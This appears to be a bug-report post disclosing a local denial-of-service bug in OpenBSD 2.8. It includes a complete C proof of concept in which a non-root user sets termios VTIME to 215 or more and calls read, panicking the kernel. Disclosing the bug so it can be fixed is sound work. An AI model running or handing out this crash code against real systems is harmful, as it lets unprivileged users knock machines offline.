non-root program crashes Openbsd 2.8

[Raan Young <raan@graand-visions.com>]

The following program crashes OpenBSD 2.8 immediately -- panic: timeout_add:
to_ticks < 0.  It does this even when run as a regular user.  I have confirmed
this on half a dozen different systems but I have not upgraded to 2.9 yet, so I
can't test it on that.  I have trimmed the program down to the minimum necessary
and added comments to highlight some aspects.  This is a generic kernel with the
gre device removed, NMBCLUSTERS set to 8192 and PCMCIAVERBOSE added.  All
patches up thru 030 have been added.  This is on i386 architecture.

I thought somebody might be interested in addressing this.  Since it should be
reproducible by compiling and running this program I am not adding dmseg, etc.
A search for timeout_add and termio in the bugs archive did not find anything
relating to this problem.

Raan Young



/*  Crash OpenBSD 2.8 immediately -- does not require root access         */
/*                                                                        */
/*     panic: timeout_add: to_ticks < 0                                   */

#include    <stdio.h>
#include    <fcntl.h>
#include    <termios.h>

struct termios ioarg;
int fd;
char *strcpy();
char *ttyname();
char name[256];
unsigned char string[256];

main(argc, argv) int argc; char *argv[];
  {
    /* each block (except comments) is necessary to produce the panic */

    strcpy(name, ttyname(fileno(stdin)));
    fd = open(name, O_RDWR);
    tcgetattr(fd, &ioarg);

    ioarg.c_lflag &= ~ICANON;
    ioarg.c_cc[VMIN] = 0;
    ioarg.c_cc[VTIME] = 215;              /* 215 or greater causes panic */
    tcsetattr(fd, TCSADRAIN, &ioarg);

    fprintf(stderr, "bye bye\n\n");
    read(fd, string, 1);                  /* panic here */

    fprintf(stderr, "\nstill here?!\n\n");
    exit(0);
  }